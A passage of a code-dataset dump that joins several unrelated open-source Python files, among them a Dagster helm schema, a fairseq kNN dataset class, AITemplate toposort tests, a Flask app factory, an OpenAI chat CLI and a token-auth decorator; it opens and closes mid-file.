TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS\nIN THE SOFTWARE.\\\n\"\"\"\n\nimport sys\nimport os\nimport importlib\n\nfrom doit.support.app.io import read_all, write_items\nfrom doit.text.pgen.builders.builder import Builder\n\nCACHE_DIR = os.path.dirname(os.path.realpath(__file__))\nCOMMANDS_CACHE = os.path.join(CACHE_DIR, 'commands')\nCOMMANDS_DIR = os.path.dirname(os.path.realpath(\n sys.modules[Builder.__module__].__file__\n))\nCOMMANDS_BASE = '.'.join(Builder.__module__.split('.')[:-1])\n\ndel Builder\ndel sys\n\ndef get_commands(dont_import = False):\n \"\"\"\n \"\"\"\n\n cache_raw_data = read_all(COMMANDS_CACHE)\n if cache_raw_data is None:\n return None\n cache_data = cache_raw_data.split('\\n')\n cache_data = [x.strip() for x in cache_data]\n cache_data = [x for x in cache_data if x]\n cache_data = [x.split(' ') for x in cache_data]\n cache_data = [[x for x in y if x] for y in cache_data]\n if not cache_data:\n return []\n length_set = dict([(len(x), 1) for x in cache_data])\n if len(length_set) != 1 or 2 not in length_set:\n return None\n cache_data = [(x[0].strip(), x[1].strip()) for x in cache_data]\n if dont_import:\n return cache_data\n importlib.invalidate_caches()\n commands = []\n try:\n for x in cache_data:\n m = importlib.import_module(\"%s.%s\" % x)\n if not m or not hasattr(m, 'get_command_class'):\n return None\n commands.append(m.get_command_class())\n except ImportError:\n return None\n return commands\n#-def\n\ndef add_command(name):\n \"\"\"\n \"\"\"\n\n command_file = os.path.join(COMMANDS_DIR, \"%s.py\" % name)\n if not os.path.exists(command_file) or not os.path.isfile(command_file):\n return False, \"File <%s> not found\" % command_file\n cache_data = get_commands(dont_import = True)\n if cache_data is None:\n return False, \"Can't read from cache <%s>\" % COMMANDS_CACHE\n if name in [x[1] for x in cache_data]:\n return False, \"Command/Builder `%s` has been already added\" % name\n cache_data.append((COMMANDS_BASE, name))\n if not write_items(COMMANDS_CACHE, cache_data, (lambda x: \"%s %s\\n\" % x)):\n return False, \"Can't write to cache <%s>\" % COMMANDS_CACHE\n return True, \"\"\n#-def\n","repo_name":"i386x/doit","sub_path":"doit/text/pgen/cache/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9882009487","text":"from enum import Enum\nfrom typing import Any, Dict, List, Optional, Union\n\nfrom pydantic import Extra\n\nfrom ...utils import kubernetes\nfrom ...utils.utils import BaseModel, ConfigurableClass, create_json_schema_conditionals\nfrom .config import IntSource\n\n\nclass RunCoordinatorType(str, Enum):\n QUEUED = \"QueuedRunCoordinator\"\n CUSTOM = \"CustomRunCoordinator\"\n\n\nclass TagConcurrencyLimitConfig(BaseModel):\n applyLimitPerUniqueValue: bool\n\n class Config:\n extra = Extra.forbid\n\n\nclass TagConcurrencyLimit(BaseModel):\n key: str\n value: Optional[Union[str, TagConcurrencyLimitConfig]]\n limit: int\n\n class Config:\n extra = Extra.forbid\n\n\nclass QueuedRunCoordinatorConfig(BaseModel):\n maxConcurrentRuns: Optional[IntSource]\n tagConcurrencyLimits: Optional[List[TagConcurrencyLimit]]\n dequeueIntervalSeconds: Optional[IntSource]\n dequeueNumWorkers: Optional[IntSource]\n dequeueUseThreads: Optional[bool]\n\n class Config:\n extra = Extra.forbid\n\n\nclass RunCoordinatorConfig(BaseModel):\n queuedRunCoordinator: Optional[QueuedRunCoordinatorConfig]\n customRunCoordinator: Optional[ConfigurableClass]\n\n\nclass RunCoordinator(BaseModel):\n enabled: bool\n type: RunCoordinatorType\n config: RunCoordinatorConfig\n\n class Config:\n extra = Extra.forbid\n schema_extra = {\n \"allOf\": create_json_schema_conditionals(\n {\n RunCoordinatorType.QUEUED: \"queuedRunCoordinator\",\n RunCoordinatorType.CUSTOM: \"customRunCoordinator\",\n }\n )\n }\n\n\nclass Sensors(BaseModel):\n useThreads: bool\n numWorkers: Optional[int]\n numSubmitWorkers: Optional[int]\n\n\nclass Schedules(BaseModel):\n useThreads: bool\n numWorkers: Optional[int]\n numSubmitWorkers: Optional[int]\n\n\nclass Daemon(BaseModel):\n enabled: bool\n image: kubernetes.Image\n runCoordinator: RunCoordinator\n heartbeatTolerance: int\n env: Union[Dict[str, str], List[kubernetes.EnvVar]]\n envConfigMaps: List[kubernetes.ConfigMapEnvSource]\n envSecrets: List[kubernetes.SecretEnvSource]\n deploymentLabels: Dict[str, str]\n labels: Dict[str, str]\n nodeSelector: kubernetes.NodeSelector\n affinity: kubernetes.Affinity\n tolerations: kubernetes.Tolerations\n podSecurityContext: kubernetes.PodSecurityContext\n securityContext: kubernetes.SecurityContext\n resources: kubernetes.Resources\n livenessProbe: kubernetes.LivenessProbe\n readinessProbe: kubernetes.ReadinessProbe\n startupProbe: kubernetes.StartupProbe\n annotations: kubernetes.Annotations\n runMonitoring: Dict[str, Any]\n runRetries: Dict[str, Any]\n sensors: Sensors\n schedules: Schedules\n schedulerName: Optional[str]\n volumeMounts: Optional[List[kubernetes.VolumeMount]]\n volumes: Optional[List[kubernetes.Volume]]\n\n class Config:\n extra = Extra.forbid\n","repo_name":"dagster-io/dagster","sub_path":"helm/dagster/schema/schema/charts/dagster/subschema/daemon.py","file_name":"daemon.py","file_ext":"py","file_size_in_byte":2914,"program_lang":"python","lang":"en","doc_type":"code","stars":8986,"dataset":"github-code","pt":"53"} +{"seq_id":"18009866050","text":"\nimport logging\n\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\nfrom fairseq.data import FairseqDataset, data_utils, plasma_utils\n\n\nlogger = logging.getLogger(__name__)\n\ndef collate(\n samples,\n pad_idx,\n eos_idx,\n left_pad_source=True,\n left_pad_target=False,\n input_feeding=True,\n pad_to_length=None,\n pad_to_multiple=1,\n):\n if len(samples) == 0:\n return {}\n\n def merge(key, left_pad, move_eos_to_beginning=False, pad_to_length=None):\n if key == \"source\" or key == \"target\": \n return data_utils.collate_tokens(\n [s[key] for s in samples],\n pad_idx,\n eos_idx,\n left_pad,\n move_eos_to_beginning,\n pad_to_length=pad_to_length,\n pad_to_multiple=pad_to_multiple,\n )\n elif key == \"knntargets\":\n \"\"\"\n for key == \"knntargets\" or key == \"distances\",\n move_eos_to_beginning must be False\n \"\"\"\n values = [s[key] for s in samples]\n size = max(v.size(0) for v in values)\n size = size if pad_to_length is None else max(size, pad_to_length)\n if pad_to_multiple != 1 and size % pad_to_multiple != 0:\n size = int(((size - 0.1) // pad_to_multiple + 1) * pad_to_multiple)\n k = values[0].size(-1)\n for i in range(len(values)):\n values[i] = torch.cat([values[i].new(size - values[i].size(0), k).fill_(pad_idx),values[i]] if left_pad else [values[i], values[i].new(size - values[i].size(0), k).fill_(pad_idx)] , dim=0)\n return torch.stack(values)\n elif key == \"distances\":\n values = [s[key] for s in samples]\n size = max(v.size(0) for v in values)\n size = size if pad_to_length is None else max(size, pad_to_length)\n if pad_to_multiple != 1 and size % pad_to_multiple != 0:\n size = int(((size - 0.1) // pad_to_multiple + 1) * pad_to_multiple)\n k = values[0].size(-1)\n for i in range(len(values)):\n values[i] = torch.cat([values[i].new(size - values[i].size(0), k).fill_(5e4), values[i]] if left_pad else [values[i], values[i].new(size - values[i].size(0), k).fill_(5e4)], dim=0) # 5e4是接近于float16的最大值的数,直接用inf会报错\n return torch.stack(values)\n else:\n raise ValueError(\n \"Unsupported language modeling collate key: {}\".format(key)\n )\n def check_alignment(alignment, src_len, tgt_len):\n if alignment is None or len(alignment) == 0:\n return False\n if (\n alignment[:, 0].max().item() >= src_len - 1\n or alignment[:, 1].max().item() >= tgt_len - 1\n ):\n logger.warning(\"alignment size mismatch found, skipping alignment!\")\n return False\n return True\n\n def compute_alignment_weights(alignments):\n \"\"\"\n Given a tensor of shape [:, 2] containing the source-target indices\n corresponding to the alignments, a weight vector containing the\n inverse frequency of each target index is computed.\n For e.g. if alignments = [[5, 7], [2, 3], [1, 3], [4, 2]], then\n a tensor containing [1., 0.5, 0.5, 1] should be returned (since target\n index 3 is repeated twice)\n \"\"\"\n align_tgt = alignments[:, 1]\n _, align_tgt_i, align_tgt_c = torch.unique(\n align_tgt, return_inverse=True, return_counts=True\n )\n align_weights = align_tgt_c[align_tgt_i[np.arange(len(align_tgt))]]\n return 1.0 / align_weights.float()\n\n\n id = torch.LongTensor([s[\"id\"] for s in samples])\n src_tokens = merge(\n \"source\",\n left_pad=left_pad_source,\n pad_to_length=pad_to_length[\"source\"] if pad_to_length is not None else None,\n )\n # sort by descending source length\n src_lengths = torch.LongTensor(\n [s[\"source\"].ne(pad_idx).long().sum() for s in samples]\n )\n src_lengths, sort_order = src_lengths.sort(descending=True)\n id = id.index_select(0, sort_order)\n src_tokens = src_tokens.index_select(0, sort_order)\n prev_output_tokens = None\n target = None\n if samples[0].get(\"target\", None) is not None:\n target = merge(\n \"target\",\n left_pad=left_pad_target,\n pad_to_length=pad_to_length[\"target\"]\n if pad_to_length is not None\n else None,\n )\n target = target.index_select(0, sort_order)\n tgt_lengths = torch.LongTensor(\n [s[\"target\"].ne(pad_idx).long().sum() for s in samples]\n ).index_select(0, sort_order)\n\n if samples[0]['knntargets'] is not None:\n knntargets = merge('knntargets',\n left_pad=left_pad_target,\n pad_to_length=pad_to_length[\"target\"]\n if pad_to_length is not None\n else None,).index_select(0, sort_order)\n else:\n knntargets = None\n\n if samples[0]['distances'] is not None:\n distances = merge('distances',\n left_pad=left_pad_target,\n pad_to_length=pad_to_length[\"target\"]\n if pad_to_length is not None\n else None,).index_select(0, sort_order)\n else:\n distances = None\n \n ntokens = tgt_lengths.sum().item()\n if samples[0].get(\"prev_output_tokens\", None) is not None:\n prev_output_tokens = merge(\"prev_output_tokens\", left_pad=left_pad_target)\n elif input_feeding:\n # we create a shifted version of targets for feeding the\n # previous output token(s) into the next decoder step\n prev_output_tokens = merge(\n \"target\",\n left_pad=left_pad_target,\n move_eos_to_beginning=True,\n pad_to_length=pad_to_length[\"target\"]\n if pad_to_length is not None\n else None,\n )\n else:\n ntokens = src_lengths.sum().item()\n \n batch = {\n \"id\": id,\n \"nsentences\": len(samples),\n \"ntokens\": ntokens,\n \"net_input\": {\n \"src_tokens\": src_tokens,\n \"src_lengths\": src_lengths,\n },\n \"target\": target,\n \"knntargets\": knntargets,\n \"distances\": distances,\n }\n if prev_output_tokens is not None:\n batch[\"net_input\"][\"prev_output_tokens\"] = prev_output_tokens.index_select(\n 0, sort_order\n )\n if samples[0].get(\"alignment\", None) is not None:\n bsz, tgt_sz = batch[\"target\"].shape\n src_sz = batch[\"net_input\"][\"src_tokens\"].shape[1]\n\n offsets = torch.zeros((len(sort_order), 2), dtype=torch.long)\n offsets[:, 1] += torch.arange(len(sort_order), dtype=torch.long) * tgt_sz\n if left_pad_source:\n offsets[:, 0] += src_sz - src_lengths\n if left_pad_target:\n offsets[:, 1] += tgt_sz - tgt_lengths\n\n alignments = [\n alignment + offset\n for align_idx, offset, src_len, tgt_len in zip(\n sort_order, offsets, src_lengths, tgt_lengths\n )\n for alignment in [samples[align_idx][\"alignment\"].view(-1, 2)]\n if check_alignment(alignment, src_len, tgt_len)\n ]\n\n if len(alignments) > 0:\n alignments = torch.cat(alignments, dim=0)\n align_weights = compute_alignment_weights(alignments)\n\n batch[\"alignments\"] = alignments\n batch[\"align_weights\"] = align_weights\n\n if samples[0].get(\"constraints\", None) is not None:\n # Collate the packed constraints across the samples, padding to\n # the length of the longest sample.\n lens = [sample.get(\"constraints\").size(0) for sample in samples]\n max_len = max(lens)\n constraints = torch.zeros((len(samples), max(lens))).long()\n for i, sample in enumerate(samples):\n constraints[i, 0 : lens[i]] = samples[i].get(\"constraints\")\n batch[\"constraints\"] = constraints\n\n return batch\n\n\nclass LanguagePairWithKNNTargetsDataset(FairseqDataset):\n def __init__(\n self,\n src,\n src_sizes,\n src_dict,\n tgt=None,\n tgt_sizes=None,\n tgt_dict=None,\n knn_targets=None,\n knn_distances=None,\n left_pad_source=True,\n left_pad_target=False,\n shuffle=True,\n input_feeding=True,\n align_dataset=None,\n constraints=None,\n eos=None,\n num_buckets=0,\n src_lang_id=None,\n tgt_lang_id=None,\n pad_to_multiple=1,\n knn_k=8,\n ):\n if tgt_dict is not None:\n assert src_dict.pad() == tgt_dict.pad()\n assert src_dict.eos() == tgt_dict.eos()\n assert src_dict.unk() == tgt_dict.unk()\n if tgt is not None:\n assert len(src) == len(\n tgt\n ), \"Source and target must contain the same number of examples\"\n self.src = src\n self.tgt = tgt\n self.src_sizes = np.array(src_sizes, dtype=np.int)\n self.tgt_sizes = np.array(tgt_sizes, dtype=np.int) if tgt_sizes is not None else None\n self.sizes = (\n np.vstack((self.src_sizes, self.tgt_sizes)).T\n if self.tgt_sizes is not None\n else self.src_sizes\n )\n self.src_dict = src_dict\n self.tgt_dict = tgt_dict\n self.knn_targets = knn_targets\n self.knn_distances = knn_distances\n self.left_pad_source = left_pad_source\n self.left_pad_target = left_pad_target\n self.shuffle = shuffle\n self.input_feeding = input_feeding\n self.align_dataset = align_dataset\n if self.align_dataset is not None:\n assert (\n self.tgt_sizes is not None\n ), \"Both source and target needed when alignments are provided\"\n self.constraints = constraints\n self.eos = eos if eos is not None else src_dict.eos()\n self.src_lang_id = src_lang_id\n self.tgt_lang_id = tgt_lang_id\n # num_buckets always 0\n if num_buckets > 0:\n from fairseq.data import BucketPadLengthDataset\n self.src = BucketPadLengthDataset(\n self.src,\n sizes=self.src_sizes,\n num_buckets=num_buckets,\n pad_idx=self.src_dict.pad(),\n left_pad=self.left_pad_source,\n )\n self.src_sizes = self.src.sizes\n logger.info(\"bucketing source lengths: {}\".format(list(self.src.buckets)))\n if self.tgt is not None:\n self.tgt = BucketPadLengthDataset(\n self.tgt,\n sizes=self.tgt_sizes,\n num_buckets=num_buckets,\n pad_idx=self.tgt_dict.pad(),\n left_pad=self.left_pad_target,\n )\n self.tgt_sizes = self.tgt.sizes\n logger.info(\n \"bucketing target lengths: {}\".format(list(self.tgt.buckets))\n )\n\n # determine bucket sizes using self.num_tokens, which will return\n # the padded lengths (thanks to BucketPadLengthDataset)\n num_tokens = np.vectorize(self.num_tokens, otypes=[np.long])\n self.bucketed_num_tokens = num_tokens(np.arange(len(self.src)))\n self.buckets = [\n (None, num_tokens) for num_tokens in np.unique(self.bucketed_num_tokens)\n ]\n else:\n self.buckets = None\n\n self.pad_to_multiple = pad_to_multiple\n\n try:\n from fairseq.data.token_block_utils_fast import (\n _get_slice_indices_fast,\n _get_block_to_dataset_index_fast,\n )\n except ImportError:\n raise ImportError(\n 'Please build Cython components with: `pip install --editable .` '\n 'or `python setup.py build_ext --inplace`'\n )\n block_size = 0\n slice_indices = _get_slice_indices_fast(self.tgt_sizes, \"eos\", block_size, 1)\n self._slice_indices = plasma_utils.PlasmaArray(slice_indices)\n\n assert np.sum(self.tgt_sizes) == self.knn_distances.shape[0]\n self.knn_k = knn_k\n\n def get_batch_shapes(self):\n return self.buckets\n @property\n def slice_indices(self):\n return self._slice_indices.array\n def __getitem__(self, index):\n # print(\"index is : \", index)\n tgt_item = self.tgt[index] if self.tgt is not None else None\n src_item = self.src[index]\n # print(\"self.knn_targets[index] len is : \", len(self.knn_targets[index]))\n # print(\"tgt_item len is : \", len(tgt_item))\n slice_s, slice_e = self.slice_indices[index]\n # print(f\"slice_e - slice_s is : {slice_e - slice_s} ; slice_s is : {slice_s}; slice_e is : {slice_e} \")\n\n if self.knn_targets is not None:\n item_knntargets = torch.from_numpy(np.copy(self.knn_targets[slice_s: slice_e])[:, :self.knn_k]).type_as(tgt_item)\n else:\n item_knntargets = None\n \n if self.knn_distances is not None:\n item_distances = torch.from_numpy(np.copy(self.knn_distances[slice_s: slice_e])[:, :self.knn_k]).float()\n else:\n item_distances = None\n example = {\n \"id\": index,\n \"source\": src_item,\n \"target\": tgt_item,\n \"knntargets\": item_knntargets,\n \"distances\": item_distances,\n }\n if self.align_dataset is not None:\n example[\"alignment\"] = self.align_dataset[index]\n if self.constraints is not None:\n example[\"constraints\"] = self.constraints[index]\n return example\n \n def __len__(self):\n return len(self.src)\n def collater(self, samples, pad_to_length=None):\n \"\"\"Merge a list of samples to form a mini-batch.\n\n Args:\n samples (List[dict]): samples to collate\n pad_to_length (dict, optional): a dictionary of\n {'source': source_pad_to_length, 'target': target_pad_to_length}\n to indicate the max length to pad to in source and target respectively.\n\n Returns:\n dict: a mini-batch with the following keys:\n\n - `id` (LongTensor): example IDs in the original input order\n - `ntokens` (int): total number of tokens in the batch\n - `net_input` (dict): the input to the Model, containing keys:\n\n - `src_tokens` (LongTensor): a padded 2D Tensor of tokens in\n the source sentence of shape `(bsz, src_len)`. Padding will\n appear on the left if *left_pad_source* is ``True``.\n - `src_lengths` (LongTensor): 1D Tensor of the unpadded\n lengths of each source sentence of shape `(bsz)`\n - `prev_output_tokens` (LongTensor): a padded 2D Tensor of\n tokens in the target sentence, shifted right by one\n position for teacher forcing, of shape `(bsz, tgt_len)`.\n This key will not be present if *input_feeding* is\n ``False``. Padding will appear on the left if\n *left_pad_target* is ``True``.\n - `src_lang_id` (LongTensor): a long Tensor which contains source\n language IDs of each sample in the batch\n\n - `target` (LongTensor): a padded 2D Tensor of tokens in the\n target sentence of shape `(bsz, tgt_len)`. Padding will appear\n on the left if *left_pad_target* is ``True``.\n - `tgt_lang_id` (LongTensor): a long Tensor which contains target language\n IDs of each sample in the batch\n \"\"\"\n res = collate(\n samples,\n pad_idx=self.src_dict.pad(),\n eos_idx=self.eos,\n left_pad_source=self.left_pad_source,\n left_pad_target=self.left_pad_target,\n input_feeding=self.input_feeding,\n pad_to_length=pad_to_length,\n pad_to_multiple=self.pad_to_multiple,\n )\n if self.src_lang_id is not None or self.tgt_lang_id is not None:\n src_tokens = res[\"net_input\"][\"src_tokens\"]\n bsz = src_tokens.size(0)\n if self.src_lang_id is not None:\n res[\"net_input\"][\"src_lang_id\"] = (\n torch.LongTensor([[self.src_lang_id]]).expand(bsz, 1).to(src_tokens)\n )\n if self.tgt_lang_id is not None:\n res[\"tgt_lang_id\"] = (\n torch.LongTensor([[self.tgt_lang_id]]).expand(bsz, 1).to(src_tokens)\n )\n return res\n def num_tokens(self, index):\n \"\"\"Return the number of tokens in a sample. This value is used to\n enforce ``--max-tokens`` during batching.\"\"\"\n return max(\n self.src_sizes[index],\n self.tgt_sizes[index] if self.tgt_sizes is not None else 0,\n )\n\n def size(self, index):\n \"\"\"Return an example's size as a float or tuple. This value is used when\n filtering a dataset with ``--max-positions``.\"\"\"\n return (\n self.src_sizes[index],\n self.tgt_sizes[index] if self.tgt_sizes is not None else 0,\n )\n def ordered_indices(self):\n \"\"\"Return an ordered list of indices. Batches will be constructed based\n on this order.\"\"\"\n print(\"self.shuffle is : \", self.shuffle)\n if self.shuffle:\n indices = np.random.permutation(len(self)).astype(np.int64)\n else:\n indices = np.arange(len(self), dtype=np.int64)\n return indices\n @property\n def supports_prefetch(self):\n return getattr(self.src, \"supports_prefetch\", False) and (\n getattr(self.tgt, \"supports_prefetch\", False) or self.tgt is None\n )\n\n def prefetch(self, indices):\n self.src.prefetch(indices)\n if self.tgt is not None:\n self.tgt.prefetch(indices)\n if self.align_dataset is not None:\n self.align_dataset.prefetch(indices)\n\n def filter_indices_by_size(self, indices, max_sizes):\n \"\"\"Filter a list of sample indices. Remove those that are longer\n than specified in max_sizes.\n\n Args:\n indices (np.array): original array of sample indices\n max_sizes (int or list[int] or tuple[int]): max sample size,\n can be defined separately for src and tgt (then list or tuple)\n\n Returns:\n np.array: filtered sample array\n list: list of removed indices\n \"\"\"\n return data_utils.filter_paired_dataset_indices_by_size(\n self.src_sizes,\n self.tgt_sizes,\n indices,\n max_sizes,\n )\n\n\n ","repo_name":"FadedCosine/kNN-KD","sub_path":"fairseq/data/language_pair_with_knntargets_dataset.py","file_name":"language_pair_with_knntargets_dataset.py","file_ext":"py","file_size_in_byte":18993,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"53"} +{"seq_id":"19819377900","text":"import unittest\n\nimport torch\nfrom aitemplate.compiler import compile_model, ops\nfrom aitemplate.compiler.base import Tensor\nfrom aitemplate.compiler.ops.common.epilogue import FuncEnum\nfrom aitemplate.compiler.transform.toposort import (\n _dfsSort,\n _priSort,\n SizePriTensorHelper,\n)\nfrom aitemplate.testing import detect_target\n\n\nclass TestTopoSort(unittest.TestCase):\n def _get_diff_size_graph(self):\n X1 = Tensor(shape=[10, 50], dtype=\"float16\", name=\"in_10_50\")\n X2 = Tensor(shape=[50, 1000], dtype=\"float16\", name=\"in_50_1000\")\n X3 = Tensor(shape=[1000, 5], dtype=\"float16\", name=\"in_1000_5\")\n X4 = Tensor(shape=[5, 5], dtype=\"float16\", name=\"in_5_5\")\n X5 = ops.gemm_rrr()(X1, X2)\n X5._attrs[\"name\"] = \"MUL_10_1000\"\n X6 = ops.gemm_rrr()(X3, X4)\n X6._attrs[\"name\"] = \"MUL_1000_5\"\n X7 = ops.gemm_rrr()(X5, X6)\n X7._attrs[\"name\"] = \"MUL_10_5\"\n X7._attrs[\"is_output\"] = True\n return X7\n\n def test_very_deep_toposort(self):\n x = Tensor(\n [2, 10],\n is_input=True,\n name=\"x\",\n )\n\n for _ in range(1000):\n x = ops.elementwise(FuncEnum.RELU)(x)\n\n x._attrs[\"is_output\"] = True\n x._attrs[\"name\"] = \"output\"\n\n target = detect_target()\n module = compile_model(x, target, \"./tmp\", \"test_very_deep_toposort\")\n\n x_pt = torch.randn((2, 10)).half().cuda()\n out_pt = torch.relu(x_pt)\n\n out_ait = torch.empty_like(out_pt)\n module.run_with_tensors({\"x\": x_pt}, {\"output\": out_ait})\n\n self.assertTrue(torch.equal(out_ait, out_pt))\n\n def test_size_pri_toposort(self):\n tensor = self._get_diff_size_graph()\n expected_order = [\n \"in_10_50\",\n \"in_50_1000\",\n \"in_1000_5\",\n \"in_5_5\",\n \"MUL_10_1000\",\n \"MUL_1000_5\",\n \"MUL_10_5\",\n ]\n self.assertEqual(\n [node._attrs[\"name\"] for node in _priSort(tensor, SizePriTensorHelper())],\n expected_order,\n )\n\n # dfs don't follow size pri order\n self.assertNotEqual(\n [node._attrs[\"name\"] for node in _dfsSort(tensor)], expected_order\n )\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"facebookincubator/AITemplate","sub_path":"tests/unittest/compiler/test_transform_toposort.py","file_name":"test_transform_toposort.py","file_ext":"py","file_size_in_byte":2297,"program_lang":"python","lang":"en","doc_type":"code","stars":4323,"dataset":"github-code","pt":"53"} +{"seq_id":"7417305168","text":"import os\n\nfrom flask import Flask\n\n\ndef create_app(test_config=None):\n # create and configure the app\n app = Flask(__name__, instance_relative_config=True)\n app.config.from_mapping(\n SECRET_KEY='dev',\n DATABASE_URI=os.path.join(app.instance_path, 'releves.sqlite'),\n DT_FMT=\"%Y-%m-%d %H:%M:%S\",\n CSRF_ENABLED=True\n )\n\n if test_config is None:\n # load the instance config, if it exists, when not testing\n app.config.from_pyfile('config.py', silent=True)\n else:\n # load the test config if passed in\n app.config.from_mapping(test_config)\n\n # ensure the instance folder exists\n try:\n os.makedirs(app.instance_path)\n except OSError:\n pass\n\n from . import db\n db.init_app(app)\n\n from . import api\n app.register_blueprint(api.bp)\n\n from . import web\n app.register_blueprint(web.bp)\n app.add_url_rule('/', endpoint='index')\n\n return app\n","repo_name":"patrabu/releves","sub_path":"releves/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21103298760","text":"import abc\nfrom typing import Any, Type, TypeVar\n\nimport torch\nimport torch.nn as nn\n\nfrom rl_recsys.user_modeling.features_gen import AbstractFeaturesGenerator\n\nfeature_gen_type = TypeVar(\"feature_gen_type\", bound=AbstractFeaturesGenerator)\n\n\nclass AbstractUserState(nn.Module, metaclass=abc.ABCMeta):\n # hidden state of the user\n def __init__(self, **kwargs: Any) -> None:\n super().__init__(**kwargs)\n user_state = self._generate_state(**kwargs)\n self.register_buffer(\"user_state\", user_state)\n # used to reset the intent to the initial create one at the end of an episode\n self.register_buffer(\"user_state_init\", user_state)\n\n @abc.abstractmethod\n def _generate_state(self, **kwargs: Any) -> torch.Tensor:\n \"\"\"Generate the user hidden state\"\"\"\n pass\n\n @abc.abstractmethod\n def update_state(self, selected_doc_feature: torch.Tensor, **kwargs) -> None:\n \"\"\"Update the user hidden state\"\"\"\n pass\n\n\nclass ObservableUserState(AbstractUserState):\n def __init__(\n self,\n user_features: torch.Tensor,\n interest_update_rate: float = 0.3, # y in the paper\n **kwargs: Any,\n ) -> None:\n self.user_features = user_features\n self.interest_update_rate = interest_update_rate\n super().__init__(**kwargs)\n\n def _generate_state(self) -> torch.Tensor:\n return self.user_features\n\n def reset_state(self) -> None:\n self.user_state = self.user_state_init\n\n def update_state(self, selected_doc_feature: torch.Tensor) -> None:\n index = torch.argmax(selected_doc_feature)\n delta_t = (\n -self.interest_update_rate * torch.abs(self.user_state[index]) # type: ignore\n + self.interest_update_rate\n ) * -self.user_state[\n index\n ] # type: ignore\n\n I = torch.dot(self.user_state, selected_doc_feature) # type: ignore\n p_positive = (I + 1) / 2\n p_negative = (1 - I) / 2\n\n random = torch.rand(1)\n if random < p_positive:\n self.user_state[index] += delta_t # type: ignore\n # if random < p_negative:\n # self.user_state[index] -= delta_t # type: ignore\n else:\n self.user_state[index] -= delta_t # type: ignore\n\n self.user_state = torch.clamp(self.user_state, -1, 1)\n","repo_name":"Asr419/rl_wolpertinger","sub_path":"src/rl_recsys/user_modeling/user_state.py","file_name":"user_state.py","file_ext":"py","file_size_in_byte":2349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37472898371","text":"import os\n\nimport cursor\nimport openai\nfrom prompt_toolkit import PromptSession\nfrom prompt_toolkit.auto_suggest import AutoSuggestFromHistory\nfrom rich.console import Console\nfrom rich.text import Text\n\nfrom .database import insert_message, load_conversation_history, create_conversation\n\n\ndef prompt_continuation(width, line_number, is_soft_wrap):\n return '> '\n\n\ndef start_chat(conn, conversation_name, init_prompt):\n openai.api_key = os.environ[\"OPENAI_API_KEY\"]\n conversation_id = create_conversation(conn, conversation_name)\n messages = load_conversation_history(conn, conversation_id)\n\n cursor.show()\n console = Console()\n console.print(Text.from_markup(\"\\n\" * console.height), end=\"\", soft_wrap=True)\n print(\"ESC+Enter to send\")\n\n prompt_session = PromptSession()\n while True:\n text_from_user = prompt_session.prompt('\\n> ',\n multiline=True,\n prompt_continuation=prompt_continuation,\n auto_suggest=AutoSuggestFromHistory()\n )\n print()\n\n messages.append({\n \"role\": \"user\",\n \"content\": text_from_user\n })\n insert_message(conn, conversation_id, \"user\", text_from_user)\n\n response = openai.ChatCompletion.create(\n model=\"gpt-3.5-turbo\",\n messages=messages,\n temperature=0.7,\n stream=True\n )\n\n role = None\n delta_contents = []\n\n for chunk in response:\n role = role or chunk.choices[0].delta.get(\"role\")\n delta_content = chunk.choices[0].delta.get(\"content\")\n if delta_content:\n console.print(delta_content, end=\"\", soft_wrap=True)\n delta_contents.append(delta_content)\n console.file.flush()\n print()\n\n reply = \"\".join(delta_contents)\n messages.append({\n \"role\": role,\n \"content\": reply\n })\n insert_message(conn, conversation_id, role, reply)\n","repo_name":"tartakynov/assistant","sub_path":"assistant/chat.py","file_name":"chat.py","file_ext":"py","file_size_in_byte":2129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18079090467","text":"# -*- coding: utf-8 -*-\n# http://google-styleguide.googlecode.com/svn/trunk/pyguide.html\n\nimport re\nfrom copy import deepcopy\nimport jsonschema\nfrom functools import update_wrapper\nfrom flask import request, abort\nfrom sqlalchemy.orm.exc import NoResultFound, MultipleResultsFound\nfrom smsgw.core import db\nfrom smsgw.models import User, UserToken, Template, Contact, Tag, Application, \\\n Outbox, SentItem, Inbox, Phone\n\n\ndef jsonschema_validate(schema=None, **options):\n \"\"\"\n Apply json validation on payload or function arguments\n :param payload: {dict|list} payload response\n :param options: {dict} of function parameters\n \"\"\"\n def decorator(fn):\n def wrapped_function(*args, **kwargs):\n # validate request payload\n if schema:\n jsonschema.validate(request.json, schema=schema)\n\n return fn(*args, **kwargs)\n return update_wrapper(wrapped_function, fn)\n return decorator\n\n\ndef auth(role=User.ROLE_USER):\n \"\"\"\n Authentification decorator\n :param role: {str} user role\n \"\"\"\n\n def decorator(fn):\n\n routing = {\n 'user': User,\n 'template': Template,\n 'contact': Contact,\n 'tag': Tag,\n 'application': Application,\n 'outbox': Outbox,\n 'sentitem': SentItem,\n 'inbox': Inbox,\n 'phone': Phone\n }\n\n def unauthorized():\n abort(401)\n\n def forbidden():\n abort(403)\n\n def not_found():\n abort(404)\n\n def wrapped_function(*args, **kwargs):\n # get authorization content\n authorization = request.headers.get('Authorization')\n if authorization is None:\n unauthorized()\n\n # get token by regex from authorization header\n token = None\n token_search = re.search('Token\\ ([a-zA-Z0-9\\-]{36})', authorization)\n if token_search:\n token = token_search.group(1)\n if token is None:\n unauthorized()\n\n try:\n # find user by token\n user = UserToken.query \\\n .filter_by(token=token) \\\n .one() \\\n .user\n except (NoResultFound, MultipleResultsFound):\n unauthorized()\n\n # user inactive\n if not user.isActive:\n unauthorized()\n\n # checking role\n if not user.is_admin() and user.role != role:\n forbidden()\n\n # saving user instance to request\n request.user = user\n\n # TODO(vojta)\n updates = {}\n for key, value in kwargs.iteritems():\n if hasattr(value, 'replace'):\n value = value.replace('@me', user.uuid)\n name = key.split('_')\n if len(name) > 1:\n route, field 